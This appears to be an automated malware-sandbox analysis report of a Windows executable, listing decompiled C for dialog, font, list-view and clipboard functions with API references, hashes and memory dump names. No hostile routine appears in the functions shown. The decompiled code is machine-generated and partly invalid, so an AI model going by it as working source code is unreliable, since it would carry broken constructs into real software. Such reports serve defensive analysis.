LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,004053D9,?,00000000,?,004097E7,00000000), ref: 0040531D
wcscpy.MSVCRT ref: 0040532D

Strings

netmsg.dll, xrefs: 004052D3

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
String ID: netmsg.dll
API String ID: 2767993716-3706735626
Opcode ID: cf43997b40231719751c74f47c5e443f472dd436546a9e994edbce1860f8f999
Instruction ID: 17948da3eb349c1f06e63398449681b55ea015706cd50f91573ee618f1a58307
Opcode Fuzzy Hash: cf43997b40231719751c74f47c5e443f472dd436546a9e994edbce1860f8f999
Instruction Fuzzy Hash: 3101D431501114BAE7242791EC0AF9F7B68DF047A5B20043AF902B40D2DA756E10CA9C

Uniqueness

Uniqueness Score: -1.00%

Function 0040103E, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 50
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040103E(void* __esi, void* __eflags) {
				signed int _v8;
				struct tagLOGFONTW _v100;
				signed int _t14;
				int _t21;
				long _t22;
				signed int _t25;
				struct HDC__* _t27;
				intOrPtr _t33;

				_t27 = GetDC(0);
				_t14 = GetDeviceCaps(_t27, 0x5a);
				_t25 = 0x60;
				asm("cdq");
				_v8 = _t14 * 0xe / _t25;
				ReleaseDC(0, _t27);
				E00405833( &_v100, L"MS Sans Serif", _v8, 1);
				_t21 = CreateFontIndirectW( &_v100);
				 *(__esi + 0x43c) = _t21;
				_t22 = SendDlgItemMessageW( *(__esi + 0x10), 0x3ec, 0x30, _t21, 0);
				_t33 =  *0x412fd0; // 0x0
				if(_t33 != 0) {
					return SendDlgItemMessageW( *(__esi + 0x10), 0x3ee, 0x30,  *(__esi + 0x43c), 0);
				}
				return _t22;
			}

0x0040104f
0x00401054
0x0040105f
0x00401060
0x00401065
0x00401068
0x0040107b
0x00401087
0x0040109f
0x004010a5
0x004010a7
0x004010ae
0x00000000
0x004010c1
0x004010c6

APIs

GetDC.USER32(00000000), ref: 00401049
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401054
ReleaseDC.USER32 ref: 00401068

Part of subcall function 00405833: memset.MSVCRT ref: 0040583D
Part of subcall function 00405833: wcscpy.MSVCRT ref: 0040587D

CreateFontIndirectW.GDI32(?), ref: 00401087
SendDlgItemMessageW.USER32 ref: 004010A5
SendDlgItemMessageW.USER32 ref: 004010C1

Strings

MS Sans Serif, xrefs: 00401076

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemMessageSend$CapsCreateDeviceFontIndirectReleasememsetwcscpy
String ID: MS Sans Serif
API String ID: 1274520933-168460110
Opcode ID: ed0759a4ae7ee862ca49db622f2c3c3492c51a7824ce9ae620841ebe78710657
Instruction ID: 76445cfa4d73c44bf9acfae61aa42174960e6aa773b684d89c5daaca756457af
Opcode Fuzzy Hash: ed0759a4ae7ee862ca49db622f2c3c3492c51a7824ce9ae620841ebe78710657
Instruction Fuzzy Hash: 58019E71600308BBE7216BB0DD89F2B76BDF780700F000439F601F60D0D6B0AA188B68

Uniqueness

Uniqueness Score: -1.00%

Function 00403333, Relevance: 12.2, APIs: 8, Instructions: 199
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403333(signed int __ecx, intOrPtr _a4, unsigned int _a8, intOrPtr* _a12) {
				void* __edi;
				void* __esi;
				void* _t75;
				signed int _t77;
				signed int _t91;
				signed int _t92;
				void* _t100;
				void* _t104;
				short* _t122;
				unsigned int _t128;
				intOrPtr _t131;
				signed int _t134;
				void* _t149;
				void* _t150;
				intOrPtr* _t151;
				short _t157;
				signed int _t158;

				_t132 = __ecx;
				_t75 = _a4 - 0x4e;
				_t158 = __ecx;
				if(_t75 == 0) {
					_t151 = _a12;
					__eflags =  *((intOrPtr*)(_t151 + 8)) - 0xfffffffd;
					if( *((intOrPtr*)(_t151 + 8)) == 0xfffffffd) {
						__eflags =  *((intOrPtr*)(_t151 + 4)) - 0x3e9;
						if(__eflags == 0) {
							E00402D48(__eflags,  *_t151,  *(_t151 + 0xc));
						}
					}
					__eflags =  *((intOrPtr*)(_t151 + 8)) - 0xffffff9b;
					if( *((intOrPtr*)(_t151 + 8)) != 0xffffff9b) {
						L27:
						__eflags = 0;
						return 0;
					} else {
						__eflags =  *((intOrPtr*)(_t151 + 4)) - 0x3e9;
						if( *((intOrPtr*)(_t151 + 4)) != 0x3e9) {
							goto L27;
						}
						_t77 =  *(_t151 + 0x14);
						__eflags = _t77 & 0x00000002;
						if((_t77 & 0x00000002) == 0) {
							L36:
							_t134 =  *(_t151 + 0x18) ^ _t77;
							__eflags = 0x0000f000 & _t134;
							if((0x0000f000 & _t134) == 0) {
								L39:
								__eflags =  *(_t151 + 0x14) & 0x00000002;
								if(( *(_t151 + 0x14) & 0x00000002) == 0) {
									goto L27;
								}
								__eflags =  *(_t151 + 0x18) & 0x00000002;
								if(( *(_t151 + 0x18) & 0x00000002) != 0) {
									goto L27;
								}
								__eflags =  *(_t151 + 0xc);
								E004013E1(_t158, 0x3eb, 0 |  *(_t151 + 0xc) != 0x00000000);
								__eflags =  *(_t151 + 0xc) -  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)) + 4)) - 1;
								E004013E1(_t158, 0x3ec, 0 |  *(_t151 + 0xc) !=  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)) + 4)) - 0x00000001);
								 *((intOrPtr*)(_t158 + 0x48)) = 1;
								SetDlgItemInt( *(_t158 + 0x10), 0x3ed,  *( *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)))) +  *(_t151 + 0x28) * 4), 0);
								 *((intOrPtr*)(_t158 + 0x48)) = 0;
								return 1;
							}
							L37:
							_t91 = E004027F9( *_t151,  *(_t151 + 0xc), 0xf002);
							__eflags = _t91 & 0x00000002;
							if((_t91 & 0x00000002) != 0) {
								_t92 = _t91 & 0x0000f000;
								__eflags = _t92 - 0x1000;
								_a8 = _t92;
								E004013E1(_t158, 0x3ee, 0 | _t92 == 0x00001000);
								_a8 - 0x2000 = _a8 == 0x2000;
								E004013E1(_t158, 0x3ef, 0 | _a8 == 0x00002000);
							}
							goto L39;
						}
						__eflags =  *(_t151 + 0x18) & 0x00000002;
						if(( *(_t151 + 0x18) & 0x00000002) == 0) {
							goto L37;
						}
						goto L36;
					}
				}
				_t100 = _t75 - 0xc2;
				if(_t100 == 0) {
					SendDlgItemMessageW( *(__ecx + 0x10), 0x3ed, 0xc5, 3, 0);
					E004031BE(_t158);
					E00405B17(_t149,  *(_t158 + 0x10), 0);
					goto L27;
				}
				_t104 = _t100 - 1;
				if(_t104 != 0) {
					goto L27;
				}
				_t128 = _a8 >> 0x10;
				if( *((intOrPtr*)(__ecx + 0x48)) != _t104 || _t128 != 0x300) {
					L7:
					if(_t128 != 0) {
						goto L27;
					}
					if(_a8 != 0x3f0) {
						L13:
						if(_a8 == 0x3eb) {
							E00402AD0(GetDlgItem( *(_t158 + 0x10), 0x3e9), _t132);
						}
						if(_a8 == 0x3ec) {
							E00402B13(GetDlgItem( *(_t158 + 0x10), 0x3e9), _t132);
						}
						if(_a8 == 0x3ee) {
							E00402B4D(GetDlgItem( *(_t158 + 0x10), 0x3e9), 1);
						}
						if(_a8 == 0x3ef) {
							E00402B4D(GetDlgItem( *(_t158 + 0x10), 0x3e9), 0);
						}
						if(_a8 == 2) {
							EndDialog( *(_t158 + 0x10), 2);
						}
						if(_a8 == 1) {
							E0040314A(_t158);
							EndDialog( *(_t158 + 0x10), 1);
						}
						return 1;
					}
					_t131 =  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)) + 4));
					_t132 = 0;
					if(_t131 <= 0) {
						L12:
						E004031BE(_t158);
						goto L13;
					}
					_t150 = 0;
					do {
						_t122 =  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x40)))) + _t132 * 4;
						 *(_t122 + 2) = _t132;
						_t157 =  *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x44)) + _t150 + 0xc));
						_t132 = _t132 + 1;
						_t150 = _t150 + 0x14;
						 *_t122 = _t157;
					} while (_t132 < _t131);
					goto L12;
				} else {
					if(_a8 != 0x3ed) {
						goto L27;
					} else {
						E004030F2(__ecx, __ecx);
						goto L7;
					}
				}
			}

0x00403333
0x00403339
0x0040333f
0x00403341
0x00403481
0x00403484
0x0040348d
0x0040348f
0x00403492
0x00403499
0x0040349f
0x00403492
0x004034a0
0x004034a4
0x00403478
0x00403478
0x00000000
0x004034a6
0x004034a6
0x004034a9
0x00000000
0x00000000
0x004034ab
0x004034ae
0x004034b5
0x004034bd
0x004034c0
0x004034c2
0x004034c4
0x00403511
0x00403511
0x00403515
0x00000000
0x00000000
0x0040351b
0x0040351f
0x00000000
0x00000000
0x00403529
0x00403537
0x00403545
0x00403553
0x00403571
0x00403574
0x0040357a
0x00000000
0x0040357d
0x004034c6
0x004034d0
0x004034d8
0x004034da
0x004034dc
0x004034e0
0x004034e8
0x004034f3
0x00403501
0x0040350c
0x0040350c
0x00000000
0x004034da
0x004034b7
0x004034bb
0x00000000
0x00000000
0x00000000
0x004034bb
0x004034a4
0x00403347
0x0040334c
0x00403460
0x00403467
0x00403471
0x00000000
0x00403477
0x00403352
0x00403353
0x00000000
0x00000000
0x0040335c
0x00403362
0x0040337c
0x0040337f
0x00000000
0x00000000
0x0040338b
0x004033c0
0x004033d1
0x004033d9
0x004033d9
0x004033e4
0x004033ec
0x004033ec
0x004033f7
0x00403402
0x00403408
0x0040340f
0x0040341a
0x00403420
0x0040342c
0x00403433
0x00403433
0x0040343a
0x0040343e
0x00403448
0x00403448
0x00000000
0x0040344c
0x00403390
0x00403393
0x00403397
0x004033ba
0x004033bb
0x00000000
0x004033bb
0x00403399
0x0040339b
0x004033a0
0x004033a3
0x004033aa
0x004033af
0x004033b0
0x004033b5
0x004033b5
0x00000000
0x0040336b
0x00403371
0x00000000
0x00403377
0x00403377
0x00000000
0x00403377
0x00403371

APIs

GetDlgItem.USER32 ref: 004033D7
GetDlgItem.USER32 ref: 004033EA
GetDlgItem.USER32 ref: 004033FF
GetDlgItem.USER32 ref: 00403417
EndDialog.USER32(?,00000002), ref: 00403433
EndDialog.USER32(?,00000001), ref: 00403448

Part of subcall function 004030F2: GetDlgItem.USER32 ref: 00403100
Part of subcall function 004030F2: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00403114

SendDlgItemMessageW.USER32 ref: 00403460
SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00403574

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Item$Dialog$MessageSend
String ID:
API String ID: 3975816621-0
Opcode ID: b22570e3695d17f10ab55852422601c1b292fc17fc6dd051dca6e12d0d289d37
Instruction ID: 6d0dc51428ca510c7a6a0451b1b353988afeb0acb98747cdfda1134de420bc82
Opcode Fuzzy Hash: b22570e3695d17f10ab55852422601c1b292fc17fc6dd051dca6e12d0d289d37
Instruction Fuzzy Hash: 3661A330200705ABDB329F25CC86E1ABBA9FF04315F00853EF911AB6E1D779AE50CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00403584, Relevance: 12.1, APIs: 8, Instructions: 100
windowCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00403584(void** __eax, void* __edi, intOrPtr _a4, struct HWND__* _a8) {
				RECT* _v8;
				void* __esi;
				void* _t39;
				signed int _t41;
				void* _t42;
				struct HWND__* _t47;
				signed int _t53;
				void* _t54;
				signed int _t74;
				signed int _t76;
				void* _t78;
				void** _t80;
				signed int _t84;
				void* _t88;
				signed int _t89;

				_t78 = __edi;
				_push(0xc);
				_v8 = 0;
				 *((intOrPtr*)(__edi + 0x44)) = __eax;
				L0040E038();
				if(__eax == 0) {
					_t80 = 0;
				} else {
					 *((intOrPtr*)(__eax)) = 0;
					_t80 = __eax;
				}
				 *(_t78 + 0x40) = _t80;
				_t39 =  *_t80;
				_t88 = _t39;
				if(_t88 != 0) {
					_push(_t39);
					L0040E032();
					 *_t80 = 0;
				}
				_t80[2] = _a8;
				_t41 = E0040299A(_a8);
				_t74 = 4;
				_t80[1] = _t41;
				_t42 = _t41 * _t74;
				_push( ~(0 | _t88 > 0x00000000) | _t42);
				L0040E038();
				 *_t80 = _t42;
				memset(_t42, 0, _t80[1] << 2);
				E0040751C( *(_t78 + 0x40), ( *(_t78 + 0x40))[2]);
				_t89 =  *(_t78 + 0x44);
				if(_t89 == 0) {
					_t84 = ( *(_t78 + 0x40))[1];
					_t76 = 0x14;
					_t53 = _t84 * _t76;
					_push( ~(0 | _t89 > 0x00000000) | _t53);
					L0040E038();
					 *(_t78 + 0x44) = _t53;
					if(_t84 > 0) {
						_t54 = 0;
						do {
							 *((intOrPtr*)(_t54 +  *(_t78 + 0x44) + 0xc)) = 0x78;
							_t54 = _t54 + 0x14;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
					}
					_v8 = 1;
				}
				if(E0040152F(0x448, _t78, _a4) == 1) {
					E00407487( *(_t78 + 0x40), ( *(_t78 + 0x40))[2]);
					InvalidateRect(( *(_t78 + 0x40))[2], 0, 0);
				}
				_t47 = SetFocus(_a8);
				if(_v8 != 0) {
					_push( *(_t78 + 0x44));
					L0040E032();
					return _t47;
				}
				return _t47;
			}

0x00403584
0x0040358c
0x0040358e
0x00403591
0x00403594
0x0040359c
0x004035a4
0x0040359e
0x0040359e
0x004035a0
0x004035a0
0x004035a6
0x004035a9
0x004035ab
0x004035ad
0x004035af
0x004035b0
0x004035b6
0x004035b6
0x004035bc
0x004035bf
0x004035c8
0x004035c9
0x004035cc
0x004035d5
0x004035d6
0x004035e4
0x004035e6
0x004035f4
0x004035f9
0x004035fc
0x00403601
0x00403608
0x0040360b
0x00403614
0x00403615
0x0040361d
0x00403620
0x00403622
0x00403624
0x00403627
0x0040362f
0x00403632
0x00403632
0x00403624
0x00403635
0x00403635
0x0040364d
0x00403655
0x00403662
0x00403662
0x0040366b
0x00403676
0x00403678
0x0040367b
0x00000000
0x00403680
0x00403682

APIs

??2@YAPAXI@Z.MSVCRT ref: 00403594
??3@YAXPAX@Z.MSVCRT ref: 004035B0
??2@YAPAXI@Z.MSVCRT ref: 004035D6
memset.MSVCRT ref: 004035E6
??2@YAPAXI@Z.MSVCRT ref: 00403615
InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00403662
SetFocus.USER32(?,?,?,?), ref: 0040366B
??3@YAXPAX@Z.MSVCRT ref: 0040367B

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??2@$??3@$FocusInvalidateRectmemset
String ID:
API String ID: 2313361498-0
Opcode ID: 24aef8737a6560aee288ce69192634901bd296d66f2a46c2a177e1884aa19c86
Instruction ID: 3294c0e99436dff93e0626edbac004f6b09504e7bc31cfe1dcbb88acf09cb1a4
Opcode Fuzzy Hash: 24aef8737a6560aee288ce69192634901bd296d66f2a46c2a177e1884aa19c86
Instruction Fuzzy Hash: 3A3190B2501611BFDB249F69C94592ABBA8FF04354B04893EF605E76E0C77AEC108B54

Uniqueness

Uniqueness Score: -1.00%

Function 004054F1, Relevance: 12.0, APIs: 8, Instructions: 42
clipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E004054F1(void* _a4) {
				int _t7;
				signed int _t12;
				int _t14;
				void* _t18;
				signed int _t20;
				void* _t23;

				_t23 = _a4;
				_t20 = 0;
				EmptyClipboard();
				if(_t23 != 0) {
					_t7 = wcslen(_t23);
					_t3 = _t7 + 2; // 0x2
					_t14 = _t7 + _t3;
					_t18 = GlobalAlloc(0x2000, _t14);
					if(_t18 != 0) {
						memcpy(GlobalLock(_t18), _t23, _t14);
						GlobalUnlock(_t18);
						_t12 = SetClipboardData(0xd, _t18);
						asm("sbb esi, esi");
						_t20 =  ~( ~_t12);
					}
				}
				CloseClipboard();
				return _t20;
			}

0x004054f2
0x004054f7
0x004054f9
0x00405501
0x00405506
0x0040550c
0x0040550c
0x0040551c
0x00405520
0x0040552c
0x00405535
0x0040553e
0x00405548
0x0040554a
0x0040554a
0x0040554d
0x0040554e
0x00405558

APIs

EmptyClipboard.USER32(?,?,0040AE96,00000000), ref: 004054F9
wcslen.MSVCRT ref: 00405506
GlobalAlloc.KERNEL32(00002000,00000002,00000000,?,?,?,0040AE96,00000000), ref: 00405516
GlobalLock.KERNEL32 ref: 00405523
memcpy.MSVCRT ref: 0040552C
GlobalUnlock.KERNEL32(00000000), ref: 00405535
SetClipboardData.USER32 ref: 0040553E
CloseClipboard.USER32 ref: 0040554E

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
String ID:
API String ID: 1213725291-0
Opcode ID: 3f23b09ed67182d54db4a1c9f3f8af9c1593430563a161df7ce732bfd0db5a6d
Instruction ID: cbe089e464cab8641743a2df57c61d738c9647510a312ad91d4355c2b2932f4a
Opcode Fuzzy Hash: 3f23b09ed67182d54db4a1c9f3f8af9c1593430563a161df7ce732bfd0db5a6d
Instruction Fuzzy Hash: 94F0BB371003287BD23037B1ED4CD6B776CDB85B49B05013DF505F6652DA355C084AB9

Uniqueness

Uniqueness Score: -1.00%

Function 004078E1, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E004078E1(intOrPtr* __eax, void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				signed int _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t75;
				signed int _t77;
				signed short _t86;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				signed short _t96;
				void* _t98;
				signed int _t126;
				signed int _t128;
				signed int _t130;
				intOrPtr* _t133;
				signed int _t137;
				signed int _t139;
				void* _t142;
				void* _t143;
				void* _t147;

				_t143 = __eflags;
				_push(__ecx);
				_push(__ecx);
				_t133 = __eax;
				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x6c))();
				E0040768E(__eax);
				 *(_t133 + 0x40) =  *(_t133 + 0x40) & 0x00000000;
				_t137 = 0xb;
				 *((intOrPtr*)(_t133 + 0x2ac)) = _a4;
				_t126 = 0x14;
				_t75 = _t137 * _t126;
				 *(_t133 + 0x2e0) = _t137;
				_push( ~(0 | _t143 > 0x00000000) | _t75);
				L0040E038();
				 *(_t133 + 0x2e4) = _t75;
				_t128 = 0x14;
				_t77 = _t137 * _t128;
				_push( ~(0 | _t143 > 0x00000000) | _t77);
				L0040E038();
				_t98 = 0x4120c0;
				 *(_t133 + 0x48) = _t77;
				_v8 = 0x4120c0;
				do {
					_t139 =  *_t98 * 0x14;
					memcpy( *(_t133 + 0x2e4) + _t139, _t98, 0x14);
					_t24 = _t98 + 0x14; // 0x4120d4
					memcpy( *(_t133 + 0x48) + _t139, _t24, 0x14);
					_t86 =  *( *(_t133 + 0x2e4) + _t139 + 0x10);
					_t142 = _t142 + 0x18;
					_v12 = _t86;
					 *( *(_t133 + 0x48) + _t139 + 0x10) = _t86;
					if((_t86 & 0xffff0000) == 0) {
						 *( *(_t133 + 0x2e4) + _t139 + 0x10) = E00406827(_t86 & 0x0000ffff);
						_t96 = E00406827(_v12 | 0x00010000);
						_t98 = _v8;
						 *( *(_t133 + 0x48) + _t139 + 0x10) = _t96;
					}
					_t98 = _t98 + 0x28;
					_t147 = _t98 - 0x412278;
					_v8 = _t98;
				} while (_t147 < 0);
				 *(_t133 + 0x4c) =  *(_t133 + 0x4c) & 0x00000000;
				 *((intOrPtr*)(_t133 + 0x50)) = _a8;
				_t88 = 0xb;
				_t130 = 4;
				 *(_t133 + 0x34) = _t88;
				_t89 = _t88 * _t130;
				 *((intOrPtr*)(_t133 + 0x30)) = 0x20;
				_push( ~(0 | _t147 > 0x00000000) | _t89);
				L0040E038();
				_push(0xc);
				 *(_t133 + 0x38) = _t89;
				L0040E038();
				_t140 = _t89;
				if(_t89 == 0) {
					_t90 = 0;
					__eflags = 0;
				} else {
					_t90 = E00407440(_a4,  *((intOrPtr*)(_t133 + 0x60)), _t140);
				}
				 *((intOrPtr*)(_t133 + 0x2cc)) = _t90;
				 *((intOrPtr*)(_t133 + 0x54)) = 1;
				 *((intOrPtr*)(_t133 + 0x58)) = 0;
				 *((intOrPtr*)(_t133 + 0x2c0)) = 1;
				 *((intOrPtr*)(_t133 + 0x2c4)) = 0;
				 *((intOrPtr*)(_t133 + 0x2c8)) = 0;
				 *((intOrPtr*)(_t133 + 0x2d0)) = 1;
				 *((intOrPtr*)(_t133 + 0x2d4)) = 1;
				 *((intOrPtr*)(_t133 + 0x344)) = 0x32;
				 *((intOrPtr*)(_t133 + 0x64)) = 0xffffff;
				return E00407861(_t133);
			}

0x004078e1
0x004078e4
0x004078e5
0x004078e9
0x004078f4
0x004078f7
0x004078ff
0x00407905
0x00407906
0x00407910
0x00407913
0x00407918
0x00407922
0x00407923
0x00407928
0x00407932
0x00407935
0x0040793e
0x0040793f
0x00407945
0x0040794b
0x0040794e
0x00407951
0x00407959
0x00407962
0x00407969
0x00407973
0x0040797e
0x00407985
0x0040798d
0x00407990
0x00407994
0x004079ad
0x004079b1
0x004079b9
0x004079bc
0x004079bc
0x004079c0
0x004079c3
0x004079c9
0x004079c9
0x004079d1
0x004079d7
0x004079da
0x004079df
0x004079e0
0x004079e3
0x004079e8
0x004079f3
0x004079f4
0x004079f9
0x004079fb
0x004079fe
0x00407a03
0x00407a09
0x00407a18
0x00407a18
0x00407a0b
0x00407a11
0x00407a11
0x00407a1a
0x00407a25
0x00407a28
0x00407a2b
0x00407a31
0x00407a37
0x00407a3d
0x00407a43
0x00407a49
0x00407a53
0x00407a63

APIs

Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 0040769A
Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076A8
Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076B9
Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076D0
Part of subcall function 0040768E: ??3@YAXPAX@Z.MSVCRT ref: 004076D9

??2@YAPAXI@Z.MSVCRT ref: 00407923
??2@YAPAXI@Z.MSVCRT ref: 0040793F
memcpy.MSVCRT ref: 00407962
memcpy.MSVCRT ref: 00407973
??2@YAPAXI@Z.MSVCRT ref: 004079F4
??2@YAPAXI@Z.MSVCRT ref: 004079FE

Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F

Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4

Strings

x"A, xrefs: 004079C3

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
String ID: x"A
API String ID: 975042529-63625180
Opcode ID: 5e15de00d9b0122d9a525f1b9c652474aa833521780f625cb65b569559e88023
Instruction ID: 8801afb4ace5fbedb5bd820c2c75847393e8be4378505899df7aece04ba2f2e1
Opcode Fuzzy Hash: 5e15de00d9b0122d9a525f1b9c652474aa833521780f625cb65b569559e88023
Instruction Fuzzy Hash: 79418DB2A01712AFD718DF3AD485B99BBA4BF04314F10422FE609DB2C1D775B8208B98

Uniqueness

Uniqueness Score: -1.00%

Function 004031BE, Relevance: 10.6, APIs: 7, Instructions: 125
windowCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E004031BE(intOrPtr _a4) {
				struct HWND__* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				short _v28;
				intOrPtr _v56;
				char* _v60;
				void* _v72;
				void _v582;
				char _v584;
				struct HWND__* _t52;
				intOrPtr* _t58;
				void* _t59;
				intOrPtr _t63;
				void* _t71;
				intOrPtr _t77;
				void* _t78;
				intOrPtr _t79;
				void* _t82;
				intOrPtr _t87;
				signed int _t89;
				short* _t90;
				void* _t92;
				void* _t93;

				_t87 = _a4;
				_t52 = GetDlgItem( *(_t87 + 0x10), 0x3e9);
				_v8 = _t52;
				SendMessageW(_t52, 0x1009, 0, 0);
				SendMessageW(_v8, 0x1036, 0, 0x26);
				do {
				} while (SendMessageW(_v8, 0x101c, 0, 0) != 0);
				_push(0xc8);
				_push(0);
				_push(0);
				_push(_v8);
				_t78 = 6;
				E00402842(0x40f454, _t78);
				_t58 =  *((intOrPtr*)(_t87 + 0x40));
				_t79 =  *((intOrPtr*)(_t58 + 4));
				_t77 =  *_t58;
				_t93 = _t92 + 0x10;
				_v24 = _t79;
				_v16 = 0;
				if(_t79 <= 0) {
					L10:
					_t59 = 2;
					E004027D3(_t59, _v8, 0, _t59);
					return SetFocus(_v8);
				} else {
					goto L3;
				}
				do {
					L3:
					_v12 = 0;
					_v20 = 0;
					do {
						_t89 = _v12 << 2;
						if( *((short*)(_t77 + _t89 + 2)) == _v16) {
							_v584 = 0;
							memset( &_v582, 0, 0x1fe);
							_t93 = _t93 + 0xc;
							_v60 =  &_v584;
							_v72 = 4;
							_v56 = 0xff;
							if(SendMessageW( *( *((intOrPtr*)(_a4 + 0x40)) + 8), 0x105f, _v12,  &_v72) != 0) {
								_push(0);
								_push(_v12);
								_push(0);
								_push(0);
								_push(0);
								_push(_v8);
								_t82 = 5;
								_t71 = E004028C5( &_v584, _t82);
								_t90 = _t89 + _t77;
								_t83 =  *_t90;
								_v28 =  *_t90;
								E00402CD0(_v8, _t71, 0 | _t83 > 0x00000000);
								_t93 = _t93 + 0x24;
								if(_v28 == 0) {
									 *_t90 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x44)) + _v20 + 0xc));
								}
							}
						}
						_v12 = _v12 + 1;
						_t63 = _v24;
						_v20 = _v20 + 0x14;
					} while (_v12 < _t63);
					_v16 = _v16 + 1;
				} while (_v16 < _t63);
				goto L10;
			}

0x004031ca
0x004031d5
0x004031eb
0x004031ee
0x004031fb
0x004031fd
0x00403209
0x0040320d
0x00403212
0x00403213
0x00403214
0x0040321e
0x0040321f
0x00403224
0x00403227
0x0040322a
0x0040322c
0x00403231
0x00403234
0x00403237
0x00403313
0x00403315
0x0040331b
0x00403330
0x00000000
0x00000000
0x00000000
0x0040323d
0x0040323d
0x0040323d
0x00403240
0x00403243
0x00403246
0x00403251
0x00403264
0x0040326b
0x00403279
0x00403282
0x0040328c
0x00403299
0x004032a8
0x004032aa
0x004032ab
0x004032b4
0x004032b5
0x004032b6
0x004032b7
0x004032bc
0x004032bd
0x004032c2
0x004032c4
0x004032ce
0x004032d6
0x004032db
0x004032e1
0x004032f1
0x004032f1
0x004032e1
0x004032a8
0x004032f4
0x004032f7
0x004032fa
0x004032fe
0x00403307
0x0040330a
0x00000000

APIs

GetDlgItem.USER32 ref: 004031D5
SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 004031EE
SendMessageW.USER32(?,00001036,00000000,00000026), ref: 004031FB
SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00403207
memset.MSVCRT ref: 0040326B
